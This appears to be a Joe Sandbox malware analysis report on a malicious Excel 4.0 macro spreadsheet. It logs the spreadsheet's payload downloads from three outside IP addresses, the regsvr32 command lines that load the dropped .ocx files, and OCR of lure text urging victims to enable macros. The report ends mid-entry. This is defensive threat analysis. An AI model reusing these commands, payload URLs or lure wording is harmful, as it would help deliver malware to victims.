Source: EXCEL.EXE, 00000000.00000002.710982551.0000000004F40000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.708969859.0000000004940000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.709218648.00000000049B0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
Source: EXCEL.EXE, 00000000.00000002.712156109.0000000005127000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.709758977.0000000004B27000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.710082377.0000000004B97000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.709721242.0000000004AC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: EXCEL.EXE, 00000000.00000002.712156109.0000000005127000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.709758977.0000000004B27000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.710082377.0000000004B97000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.709721242.0000000004AC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: EXCEL.EXE, 00000000.00000002.714197720.0000000007046000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.714129022.0000000006FBE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.714162792.0000000007006000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
Source: EXCEL.EXE, 00000000.00000002.714197720.0000000007046000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: EXCEL.EXE, 00000000.00000002.714129022.0000000006FBE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.714162792.0000000007006000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
Source: regsvr32.exe, 00000003.00000002.707862300.0000000003AE0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.708060059.0000000003A90000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.706836951.0000000001CC0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.706877041.0000000001D10000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: EXCEL.EXE, 00000000.00000002.712156109.0000000005127000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.709758977.0000000004B27000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.710082377.0000000004B97000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.709721242.0000000004AC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: EXCEL.EXE, 00000000.00000002.712156109.0000000005127000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.709758977.0000000004B27000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.710082377.0000000004B97000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.709721242.0000000004AC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000003.00000002.707862300.0000000003AE0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.708060059.0000000003A90000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
Source: EXCEL.EXE, 00000000.00000002.710982551.0000000004F40000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.708969859.0000000004940000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.709218648.00000000049B0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: EXCEL.EXE, 00000000.00000002.712156109.0000000005127000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.709758977.0000000004B27000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.710082377.0000000004B97000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.709721242.0000000004AC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: EXCEL.EXE, 00000000.00000002.710982551.0000000004F40000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.708969859.0000000004940000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.709218648.00000000049B0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000002.709218648.00000000049B0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5812A59.jpgJump to behavior
Source: global trafficHTTP traffic detected: GET /533792932717.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.82.126.78Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /533792932717.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 158.69.133.78Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /533792932717.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.142.211.62Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /533792932717.dat2 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.142.211.62Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /533792932717.dat2 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.82.126.78Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /533792932717.dat2 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 158.69.133.78Connection: Keep-Alive

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 ~EcmwARNNG Thisfileoriginate
Source: Screenshot number: 4Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Screenshot number: 4Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: ClaimCopy-539408676-12022021.xlsbInitial sample: EXEC
Found protected and hidden Excel 4.0 Macro sheetShow sources
Source: ClaimCopy-539408676-12022021.xlsbInitial sample: Sheet name: Tiposa1
Source: ClaimCopy-539408676-12022021.xlsbMacro extractor: Sheet name: Tiposa1
Source: ClaimCopy-539408676-12022021.xlsbMacro extractor: Sheet name: Tiposa
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E67430_2_024E6743
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E63400_2_024E6340
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E67530_2_024E6753
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E66E80_2_024E66E8
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E66F30_2_024E66F3
Source: ClaimCopy-539408676-12022021.xlsbVirustotal: Detection: 10%
Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocxJump to behavior
Source: EXCEL.EXE, 00000000.00000002.710982551.0000000004F40000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.708969859.0000000004940000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.709218648.00000000049B0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$ClaimCopy-539408676-12022021.xlsbJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF4AA.tmpJump to behavior
Source: classification engineClassification label: mal76.expl.evad.winXLSB@13/5@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: ClaimCopy-539408676-12022021.xlsbInitial sample: OLE zip file path = xl/media/image1.jpg
Source: ClaimCopy-539408676-12022021.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: 6FC30000.0.drInitial sample: OLE zip file path = xl/media/image1.jpg
Source: 6FC30000.0.drInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2416Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 1904Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2116Thread sleep time: -60000s >= -30000sJump to behavior
Source: EXCEL.EXE, 00000000.00000002.706981756.0000000000800000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.706782266.00000000008C0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.706828868.0000000000910000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.706981756.0000000000800000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.706782266.00000000008C0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.706828868.0000000000910000.00000002.00020000.sdmpBinary or memory string: !Progman
Source: EXCEL.EXE, 00000000.00000002.706981756.0000000000800000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.706782266.00000000008C0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.706828868.0000000000910000.00000002.00020000.sdmpBinary or memory string: Program Manager<

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting2Path InterceptionProcess Injection2Masquerading1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection2NTDSSystem Information Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting2LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
ClaimCopy-539408676-12022021.xlsb10%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://schemas.openformatrg/package/2006/r0%URL Reputationsafe
http://45.142.211.62/533792932717.dat2nter0%Avira URL Cloudsafe
http://schemas.openformatrg/package/2006/content-t0%URL Reputationsafe
http://185.82.126.78/533792932717.dat2bus0%Avira URL Cloudsafe
http://185.82.126.78/533792932717.dat0%Avira URL Cloudsafe
http://158.69.133.78/533792932717.dat20%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://158.69.133.78/533792932717.dat0%Avira URL Cloudsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://185.82.126.78/533792932717.dat20%Avira URL Cloudsafe
http://schemas.open0%URL Reputationsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe
http://45.142.211.62/533792932717.dat0%Avira URL Cloudsafe
http://45.142.211.62/533792932717.dat20%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://185.82.126.78/533792932717.datfalse
  • Avira URL Cloud: safe
unknown
http://158.69.133.78/533792932717.dat2false
  • Avira URL Cloud: safe
unknown
http://158.69.133.78/533792932717.datfalse
  • Avira URL Cloud: safe
unknown
http://185.82.126.78/533792932717.dat2false
  • Avira URL Cloud: safe
unknown
http://45.142.211.62/533792932717.datfalse
  • Avira URL Cloud: safe
unknown
http://45.142.211.62/533792932717.dat2false
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckEXCEL.EXE, 00000000.00000002.712156109.0000000005127000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.709758977.0000000004B27000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.710082377.0000000004B97000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.709721242.0000000004AC7000.00000002.00020000.sdmpfalse
    high
    http://www.windows.com/pctv.regsvr32.exe, 00000004.00000002.709218648.00000000049B0000.00000002.00020000.sdmpfalse
      high
      http://investor.msn.comEXCEL.EXE, 00000000.00000002.710982551.0000000004F40000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.708969859.0000000004940000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.709218648.00000000049B0000.00000002.00020000.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtEXCEL.EXE, 00000000.00000002.710982551.0000000004F40000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.708969859.0000000004940000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.709218648.00000000049B0000.00000002.00020000.sdmpfalse
          high
          http://www.icra.org/vocabulary/.EXCEL.EXE, 00000000.00000002.712156109.0000000005127000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.709758977.0000000004B27000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.710082377.0000000004B97000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.709721242.0000000004AC7000.00000002.00020000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://schemas.openformatrg/package/2006/rEXCEL.EXE, 00000000.00000002.714129022.0000000006FBE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.714162792.0000000007006000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000003.00000002.707862300.0000000003AE0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.708060059.0000000003A90000.00000002.00020000.sdmpfalse
            high
            http://45.142.211.62/533792932717.dat2nterEXCEL.EXE, 00000000.00000002.714339127.0000000007E40000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.openformatrg/package/2006/content-tEXCEL.EXE, 00000000.00000002.714197720.0000000007046000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            unknown
            http://185.82.126.78/533792932717.dat2busEXCEL.EXE, 00000000.00000002.714339127.0000000007E40000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://investor.msn.com/EXCEL.EXE, 00000000.00000002.710982551.0000000004F40000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.708969859.0000000004940000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.709218648.00000000049B0000.00000002.00020000.sdmpfalse
              high
              http://www.%s.comPAregsvr32.exe, 00000003.00000002.707862300.0000000003AE0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.708060059.0000000003A90000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              low
              http://windowsmedia.com/redir/services.asp?WMPFriendly=trueEXCEL.EXE, 00000000.00000002.712156109.0000000005127000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.709758977.0000000004B27000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.710082377.0000000004B97000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.709721242.0000000004AC7000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.hotmail.com/oeEXCEL.EXE, 00000000.00000002.710982551.0000000004F40000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.708969859.0000000004940000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.709218648.00000000049B0000.00000002.00020000.sdmpfalse
                high
                http://schemas.openEXCEL.EXE, 00000000.00000002.714197720.0000000007046000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.714129022.0000000006FBE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.714162792.0000000007006000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                unknown
                http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.706836951.0000000001CC0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.706877041.0000000001D10000.00000002.00020000.sdmpfalse
                • Avira URL Cloud: safe
                low

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                45.142.211.62
                unknownRussian Federation
                208861RACKTECHRUfalse
                158.69.133.78
                unknownCanada
                16276OVHFRfalse
                185.82.126.78
                unknownLatvia
                52173MAKONIXLVfalse

                General Information

                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:532685
                Start date:02.12.2021
                Start time:16:09:25
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 6m 54s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:ClaimCopy-539408676-12022021.xlsb
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:12
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal76.expl.evad.winXLSB@13/5@0/3
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 5
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xlsb
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Found warning dialog
                • Click Ok
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
                • Execution Graph export aborted for target EXCEL.EXE, PID 2428 because there are no executed function

                Simulations

                Behavior and APIs

                TimeTypeDescription
                16:10:43API Interceptor3x Sleep call for process: regsvr32.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                RACKTECHRUCNSL-1741057625-Nov-22.xlsbGet hashmaliciousBrowse
                • 45.142.211.22
                CNSL-1741057625-Nov-22.xlsbGet hashmaliciousBrowse
                • 45.142.211.22
                8Jem3WHfr1.exeGet hashmaliciousBrowse
                • 193.38.235.234
                Static.exeGet hashmaliciousBrowse
                • 193.38.235.15
                aFxrnP3GU4Get hashmaliciousBrowse
                • 91.223.144.104
                mirai.armGet hashmaliciousBrowse
                • 95.181.163.105
                W1Mjz5NWWlGet hashmaliciousBrowse
                • 91.223.144.109
                qQKiWkenaq.exeGet hashmaliciousBrowse
                • 185.156.177.75
                VKtCIrdZz3.exeGet hashmaliciousBrowse
                • 185.156.177.75
                9lzoAGDhiF.exeGet hashmaliciousBrowse
                • 185.156.177.75
                jgkOeJEe1J.exeGet hashmaliciousBrowse
                • 185.156.177.75
                2xwePIrz6Y.exeGet hashmaliciousBrowse
                • 185.156.177.75
                I6l48v5NQDGet hashmaliciousBrowse
                • 193.38.234.19
                Nzt41q6zTL.exeGet hashmaliciousBrowse
                • 95.181.163.15
                setup_x86_x64_install.exeGet hashmaliciousBrowse
                • 95.181.163.181
                c2nfo64gHQ.exeGet hashmaliciousBrowse
                • 95.181.163.181
                1dGGOE2V73.exeGet hashmaliciousBrowse
                • 95.181.163.181
                1dGGOE2V73.exeGet hashmaliciousBrowse
                • 95.181.163.181
                zfl3hUTQWN.exeGet hashmaliciousBrowse
                • 95.181.163.181
                itiOTLnUZ5.exeGet hashmaliciousBrowse
                • 95.181.163.15
                OVHFRreg.exeGet hashmaliciousBrowse
                • 213.186.33.5
                REQUEST FOR SPECIFICATION.exeGet hashmaliciousBrowse
                • 213.251.158.218
                ETgVKIYRW5.dllGet hashmaliciousBrowse
                • 149.56.106.83
                cMVyW1SDZz.dllGet hashmaliciousBrowse
                • 149.56.106.83
                ETgVKIYRW5.dllGet hashmaliciousBrowse
                • 149.56.106.83
                cMVyW1SDZz.dllGet hashmaliciousBrowse
                • 149.56.106.83
                2iJBYBel22.dllGet hashmaliciousBrowse
                • 149.56.106.83
                2iJBYBel22.dllGet hashmaliciousBrowse
                • 149.56.106.83
                Tender SN980018277 & SN9901827 Signed Copy.exeGet hashmaliciousBrowse
                • 51.161.104.181
                Invoice.exeGet hashmaliciousBrowse
                • 54.38.220.85
                AegEywmjUJ.exeGet hashmaliciousBrowse
                • 51.79.99.124
                P.O SPECIFICATION.xlsxGet hashmaliciousBrowse
                • 51.79.99.124
                DC-330NC.xlsxGet hashmaliciousBrowse
                • 51.79.99.124
                FILE_915494026923219.xlsmGet hashmaliciousBrowse
                • 158.69.222.101
                UioA2E9DBG.dllGet hashmaliciousBrowse
                • 158.69.222.101
                UioA2E9DBG.dllGet hashmaliciousBrowse
                • 158.69.222.101
                916Q89rlYD.dllGet hashmaliciousBrowse
                • 158.69.222.101
                9izNuvE61W.dllGet hashmaliciousBrowse
                • 158.69.222.101
                P5LROPCURK.dllGet hashmaliciousBrowse
                • 158.69.222.101
                zTGtLv4pTO.dllGet hashmaliciousBrowse
                • 149.56.106.83

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5812A59.jpg
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
